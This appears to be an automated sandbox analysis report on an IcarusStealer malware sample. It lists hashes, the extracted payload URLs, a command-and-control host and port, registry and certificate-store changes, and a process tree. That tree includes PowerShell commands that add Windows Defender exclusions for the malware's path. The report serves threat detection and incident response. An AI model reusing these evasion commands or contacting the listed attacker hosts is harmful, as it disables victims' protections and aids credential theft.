Analysis
-
max time kernel
127s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
08/03/2024, 01:45
Static task
static1
Behavioral task
behavioral1
Sample
switched_1.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
switched_1.exe
Resource
win10v2004-20240226-en
General
-
Target
switched_1.exe
-
Size
3.7MB
-
MD5
b9bbe31d276de5c3d05352d070ae4244
-
SHA1
5e1bb67b01c579b4e0ad5a7475ceb657201c27ec
-
SHA256
a01977e758a85dc01fb8ca7da9110adfe5bf9b9bec0af1db82741fe83d20408d
-
SHA512
0a3459690bfdf8d238cb6f27c650903659c12aa589bcba037a45c68287342f53ca5c1e1b307a0abd8d481f79e3df6bd994cce6a79258343627aa7b3209b0ed17
-
SSDEEP
49152:tYDJ4w53qs7fg442ZvkOlVdP8iFoh/dYINv7sq8:e4u3cV/gHP8X1hNv7
Malware Config
Extracted
icarusstealer
-
payload_url
https://blackhatsec.org/add.jpg
https://blackhatsec.org/remove.jpg
Signatures
-
IcarusStealer
Icarus is a modular stealer written in C# First adverts in July 2022.
-
Modifies Installed Components in the registry 2 TTPs 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe -
Executes dropped EXE 2 IoCs
pid Process 2964 pulse x loader.exe 2584 tesetey.exe -
Loads dropped DLL 2 IoCs
pid Process 2660 switched_1.exe 2660 switched_1.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 3 raw.githubusercontent.com 5 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 12 ipinfo.io -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2584 set thread context of 2464 2584 tesetey.exe 41 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 5 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff explorer.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 tesetey.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde tesetey.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 2584 tesetey.exe 2584 tesetey.exe 2584 tesetey.exe 2584 tesetey.exe 2584 tesetey.exe 1724 powershell.exe 1924 powershell.exe -
Suspicious use of AdjustPrivilegeToken 15 IoCs
description pid Process Token: SeDebugPrivilege 2584 tesetey.exe Token: SeShutdownPrivilege 2400 explorer.exe Token: SeDebugPrivilege 2464 cvtres.exe Token: SeShutdownPrivilege 2400 explorer.exe Token: SeShutdownPrivilege 2400 explorer.exe Token: SeShutdownPrivilege 2400 explorer.exe Token: SeShutdownPrivilege 2400 explorer.exe Token: SeShutdownPrivilege 2400 explorer.exe Token: SeShutdownPrivilege 2400 explorer.exe Token: SeShutdownPrivilege 2400 explorer.exe Token: SeDebugPrivilege 1924 powershell.exe Token: SeDebugPrivilege 1724 powershell.exe Token: SeShutdownPrivilege 2400 explorer.exe Token: SeShutdownPrivilege 2400 explorer.exe Token: SeShutdownPrivilege 2400 explorer.exe -
Suspicious use of FindShellTrayWindow 27 IoCs
pid Process 2400 explorer.exe 2400 explorer.exe 2400 explorer.exe 2400 explorer.exe 2400 explorer.exe 2400 explorer.exe 2400 explorer.exe 2400 explorer.exe 2400 explorer.exe 2400 explorer.exe 2400 explorer.exe 2400 explorer.exe 2400 explorer.exe 2400 explorer.exe 2400 explorer.exe 2400 explorer.exe 2400 explorer.exe 2400 explorer.exe 2400 explorer.exe 2400 explorer.exe 2400 explorer.exe 2400 explorer.exe 2400 explorer.exe 2400 explorer.exe 2400 explorer.exe 2400 explorer.exe 2400 explorer.exe -
Suspicious use of SendNotifyMessage 17 IoCs
pid Process 2400 explorer.exe 2400 explorer.exe 2400 explorer.exe 2400 explorer.exe 2400 explorer.exe 2400 explorer.exe 2400 explorer.exe 2400 explorer.exe 2400 explorer.exe 2400 explorer.exe 2400 explorer.exe 2400 explorer.exe 2400 explorer.exe 2400 explorer.exe 2400 explorer.exe 2400 explorer.exe 2400 explorer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2660 wrote to memory of 2964 2660 switched_1.exe 28 PID 2660 wrote to memory of 2964 2660 switched_1.exe 28 PID 2660 wrote to memory of 2964 2660 switched_1.exe 28 PID 2660 wrote to memory of 2964 2660 switched_1.exe 28 PID 2660 wrote to memory of 2584 2660 switched_1.exe 29 PID 2660 wrote to memory of 2584 2660 switched_1.exe 29 PID 2660 wrote to memory of 2584 2660 switched_1.exe 29 PID 2660 wrote to memory of 2584 2660 switched_1.exe 29 PID 2964 wrote to memory of 2548 2964 pulse x loader.exe 31 PID 2964 wrote to memory of 2548 2964 pulse x loader.exe 31 PID 2964 wrote to memory of 2548 2964 pulse x loader.exe 31 PID 2548 wrote to memory of 2652 2548 cmd.exe 33 PID 2548 wrote to memory of 2652 2548 cmd.exe 33 PID 2548 wrote to memory of 2652 2548 cmd.exe 33 PID 2548 wrote to memory of 2552 2548 cmd.exe 34 PID 2548 wrote to memory of 2552 2548 cmd.exe 34 PID 2548 wrote to memory of 2552 2548 cmd.exe 34 PID 2548 wrote to memory of 2424 2548 cmd.exe 35 PID 2548 wrote to memory of 2424 2548 cmd.exe 35 PID 2548 wrote to memory of 2424 2548 cmd.exe 35 PID 2584 wrote to memory of 1660 2584 tesetey.exe 36 PID 2584 wrote to memory of 1660 2584 tesetey.exe 36 PID 2584 wrote to memory of 1660 2584 tesetey.exe 36 PID 2584 wrote to memory of 1660 2584 tesetey.exe 36 PID 1660 wrote to memory of 2616 1660 csc.exe 37 PID 1660 wrote to memory of 2616 1660 csc.exe 37 PID 1660 wrote to memory of 2616 1660 csc.exe 37 PID 1660 wrote to memory of 2616 1660 csc.exe 37 PID 2584 wrote to memory of 2400 2584 tesetey.exe 38 PID 2584 wrote to memory of 2400 2584 tesetey.exe 38 PID 2584 wrote to memory of 2400 2584 tesetey.exe 38 PID 2584 wrote to memory of 2400 2584 tesetey.exe 38 PID 2584 wrote to memory of 2408 2584 tesetey.exe 39 PID 2584 wrote to memory of 2408 2584 tesetey.exe 39 PID 2584 wrote to memory of 2408 2584 tesetey.exe 39 PID 2584 wrote to memory of 2408 2584 tesetey.exe 39 PID 2584 wrote to memory of 2432 2584 tesetey.exe 40 PID 2584 wrote to memory of 2432 2584 tesetey.exe 40 PID 2584 wrote to memory of 2432 2584 tesetey.exe 40 PID 2584 wrote to memory of 2432 2584 tesetey.exe 40 PID 2584 wrote to memory of 2464 2584 tesetey.exe 41 PID 2584 wrote to memory of 2464 2584 tesetey.exe 41 PID 2584 wrote to memory of 2464 2584 tesetey.exe 41 PID 2584 wrote to memory of 2464 2584 tesetey.exe 41 PID 2584 wrote to memory of 2464 2584 tesetey.exe 41 PID 2584 wrote to memory of 2464 2584 tesetey.exe 41 PID 2584 wrote to memory of 2464 2584 tesetey.exe 41 PID 2584 wrote to memory of 2464 2584 tesetey.exe 41 PID 2584 wrote to memory of 2464 2584 tesetey.exe 41 PID 2400 wrote to memory of 292 2400 explorer.exe 42 PID 2400 wrote to memory of 292 2400 explorer.exe 42 PID 2400 wrote to memory of 292 2400 explorer.exe 42 PID 2464 wrote to memory of 2688 2464 cvtres.exe 43 PID 2464 wrote to memory of 2688 2464 cvtres.exe 43 PID 2464 wrote to memory of 2688 2464 cvtres.exe 43 PID 2464 wrote to memory of 2688 2464 cvtres.exe 43 PID 2464 wrote to memory of 1548 2464 cvtres.exe 45 PID 2464 wrote to memory of 1548 2464 cvtres.exe 45 PID 2464 wrote to memory of 1548 2464 cvtres.exe 45 PID 2464 wrote to memory of 1548 2464 cvtres.exe 45 PID 1548 wrote to memory of 1924 1548 cmd.exe 47 PID 1548 wrote to memory of 1924 1548 cmd.exe 47 PID 1548 wrote to memory of 1924 1548 cmd.exe 47 PID 1548 wrote to memory of 1924 1548 cmd.exe 47 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\switched_1.exe"C:\Users\Admin\AppData\Local\Temp\switched_1.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2660 -
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2964 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"3⤵
- Suspicious use of WriteProcessMemory
PID:2548 -
C:\Windows\system32\certutil.execertutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD54⤵PID:2652
-
-
C:\Windows\system32\find.exefind /i /v "md5"4⤵PID:2552
-
-
C:\Windows\system32\find.exefind /i /v "certutil"4⤵PID:2424
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\tesetey.exe"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2584 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wfnlbhfv\wfnlbhfv.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:1660 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1B7C.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC8613C2DBF67B414E8A463426924CF2C1.TMP"4⤵PID:2616
-
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"3⤵
- Modifies Installed Components in the registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2400 -
C:\Windows\system32\ctfmon.exectfmon.exe4⤵PID:292
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM3⤵PID:2408
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM3⤵PID:2432
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2464 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit4⤵PID:2688
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1724
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit4⤵
- Suspicious use of WriteProcessMemory
PID:1548 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1924
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5b1ae4127bcb50359b0edcc52e0025e95
SHA1f87259f40ae67a73f2dee61851f89c153ba7113f
SHA2561a067edecd3154053c742ed3cf341934a27f06f1918c3ac4011c4b6bc42f3b56
SHA5124a1731ef205fae7545c126ca0b86654f531a52ca4a192ec3655b19f68a91ccaf0fd500306624b1525110777e48653d40fc9eecf636cc805f8f493c9aa586b805
-
Filesize
1.9MB
MD5e1f9a012841d02b6b01843c5c84a09f8
SHA1857b63a05ba1b02d129eeb91efa7e3d8a6475958
SHA256364a5b9255a40c5a8ba431d79abf37df8b278621f67fde99e054e16453d0cef7
SHA5127571a3462239f31e206d652f69ae3edd89219023196bff7d55bb76217d2dfcb3b1e77061f4c0a4f9ab392ec3d6a2f778467128d7d0dcc26e76b1578d8b5d0c44
-
Filesize
2.4MB
MD5beecd7735af8503be2d5abdd0a1639a7
SHA193e53ce680eaa4cd54a9dfbd65cbe5abc3174d5b
SHA256e9c02b026697752d8fa535c5586bd7f4abaa899b5e5e2ec7840b8bfae38722b7
SHA512bc3787b31e6d8dc600245eee203256b9ca9800f21fab41f7d30542740728bb59218abe5e6ec3ec8469c855c0a963790f638ea2e2694024f4d57de3306a4070a0
-
Filesize
1KB
MD5e9144225655a1177485a6238f397718e
SHA10618d989814312c38b8005fc469222f891470642
SHA256f2ff3d3919bf3120bd18978b0225c56b53eec3a645493f7fe08344671cacb21d
SHA512392b9684bc1c0d054a397bb8ed54bc682a59ea6c1c12abad5d70ec2f0065afec4645cae8c2672ec4571d5763397092388b944cd5c7582a4aa685ecd4e3a0c2a4
-
Filesize
1KB
MD514846c9faaef9299a1bf17730f20e4e6
SHA18083da995cfaa0e8e469780e32fcff1747850eb6
SHA25661bc7b23a430d724b310e374a67a60dd1e1f883c6dd3a98417c8579ba4973c1b
SHA512549d99dbb7376d9d6106ad0219d6cf22eb70c80d54c9ad8c7d0b04a33d956515e55c9608ab6eec0733f2c23602867eb85b43e58200ded129958c7de7ed22efb1
-
Filesize
448B
MD5cb9c6bc36d404c58941fbaaafbec7eb6
SHA18138f58b9f3e2b304e8ef6b24f9c43447e1fcc26
SHA256d342d9f407faa217db5dbb348bf947d91a5f073427884e4230e62d0c2eded14f
SHA5124cd91754cf19da7795fc5b72c5e2757f6f54378c1b9731185c14f4948ae56e2c0f8b2d0b451bd857990b6b25e05f585dc47cac81ba55686fec80d28cd5ceaf7b
-
Filesize
2.6MB
MD593d03553eea24aba513c5ebd4432644d
SHA16f7f0b651a7c0e2775cb161edf10b0459e172a9f
SHA25623e9fa0b264edcf4ecae8b0753752a529a03515fecec3b9502d3dbe40f773065
SHA512032b9baa882bcfc4c4dd66fda52d083e6b69ee56f02bc5b9f1af74d7ae206d8e2656874e01ab71ee7ad178afb304e8924d9e43b948ee722db7e6d27e679dae4c
-
Filesize
494KB
MD50f0838bc6642dd6bc603368e50b4aba3
SHA1932bd4d1c11996bf8ac3ac74a94b266e96d44c36
SHA2564acfa7fccfdd11c17fbb2e7a861683f749cbf6420f0d83d484a6024ff280a7a9
SHA512a39605eaa160d4f918393c600d42873f2e6bfb54506edfbe590aac0f75d12b4aa66ff91192c0522c235695a9c6b95cd2dbe308b548b5f121ca6b6b7696029860